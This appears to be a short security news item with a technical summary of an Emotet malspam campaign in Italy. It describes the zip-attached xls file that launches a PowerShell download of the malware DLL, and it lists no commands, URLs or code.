skip to Main Content

Cybercrime, Emotet returns to Italy via “RE: Email” email

Technical analysis by the Malware Hunter JAMESWT

Emotet returns to Italy via “RE: Email” email. The zip attachment contains an xls file: This starts a powershell script, which contacts various URLs and downloads the dll, activating the malware infection chain

Emotet hides itself in an email arrived in Italy, with the subject “RE: Email” and armed with a password-protected zip attachment (provided in the text).

 

Inside the compressed archive there is an xls file. This, if opened, starts a powershell script that contacts various urls and downloads the dll, activating the malware infection chain. Emotet is a banking trojan used by cybercrime, to which modules have been added over time that allow it to steal the passwords stored in the software of the victims, infect other computers connected to the same botnet and reuse emails for subsequent spam campaigns.

Malware C2

Back To Top